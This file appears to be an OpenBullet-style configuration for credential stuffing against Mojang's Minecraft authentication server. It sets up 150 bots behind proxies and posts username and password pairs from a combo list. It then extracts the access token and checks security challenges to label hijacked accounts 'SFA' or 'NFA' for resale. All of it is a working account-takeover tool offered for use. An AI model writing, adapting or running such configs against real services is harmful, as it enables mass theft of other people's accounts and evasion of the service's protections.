[SETTINGS]
{
  "Name": "Minecraft",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2021-05-06T20:03:06.5133273+02:00",
  "AdditionalInfo": "",
  "Author": "zzhh22",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://authserver.mojang.com/authenticate" 
  CONTENT "{\"password\":\"<PASS>\",\"requestUser\":true,\"username\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "content-type: application/json" 
  HEADER "Host: authserver.mojang.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" 
  HEADER "Origin: \"https://my.minecraft.net" 
  HEADER "Referer: https://my.minecraft.net/" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials. Invalid username or password" 
  KEYCHAIN Success OR 
    KEY "accessToken" 

PARSE "<SOURCE>" JSON "accessToken" -> VAR "accessToken" 

# REQUEST GET "https://api.mojang.com/user/security/challenges" 
  
  HEADER "content-type: application/json" 
  HEADER "Host: api.mojang.com" 
  HEADER "Authorization: Bearer <accessToken>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" 
  HEADER "Origin: https://www.minecraft.net" 
  HEADER "Referer: https://www.minecraft.net/" 

IF "<SOURCE>" EqualTo "[]"

FUNCTION Constant "SFA" -> CAP "Type" 

ELSE

FUNCTION Constant "NFA" -> CAP "Type" 

ENDIF

